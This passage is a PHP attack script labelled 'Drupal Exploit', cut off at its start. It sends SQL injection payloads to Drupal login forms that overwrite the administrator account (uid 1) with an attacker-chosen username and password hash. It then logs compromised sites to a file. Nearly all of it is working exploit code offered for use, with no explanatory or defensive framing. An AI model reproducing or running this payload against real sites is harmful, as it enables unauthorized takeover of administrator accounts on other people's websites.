Drupal Exploit
array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
$ctx = stream_context_create($params);
$data = file_get_contents($url . '/user/login/', null, $ctx);
echo "Scanning at \"/user/login/
\"";
if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
$fp = fopen("rock-you.txt", 'a');
echo "Success! User:fuckyou Pass:admin at {$url}/user/login
";
echo 'Finished scanning. check => Rock You ';
fwrite($fp, "Succes! User:fuckyou Pass:admin -> {$url}/user/login");
fwrite($fp, "
");
fwrite($fp, "======================================Donnazmi==============================================================");
fwrite($fp, "
");
fclose($fp);
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
}
}
if (isset($_GET['submit'])) {
$url = "http://" . $_GET['url'] . "/";
$post_data = "name[0;update users set name %3D 'fuckyou' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
$params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
", 'content' => $post_data));
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
echo "Scanning at \"Index
\"";
if (stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
$fp = fopen("rock-you.txt", 'a');
echo "Success! User:fuckyou Pass:admin at {$url}/user/login
";
echo 'Finished scanning. check => Rock you ! ';
fwrite($fp, "Success! User:fuckyou Pass:admin -> {$url}/user/login");
fwrite($fp, "
");
fwrite($fp, "======================================Donnazmi==============================================================");
fwrite($fp, "
");
fclose($fp);
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working.";
}
}
?>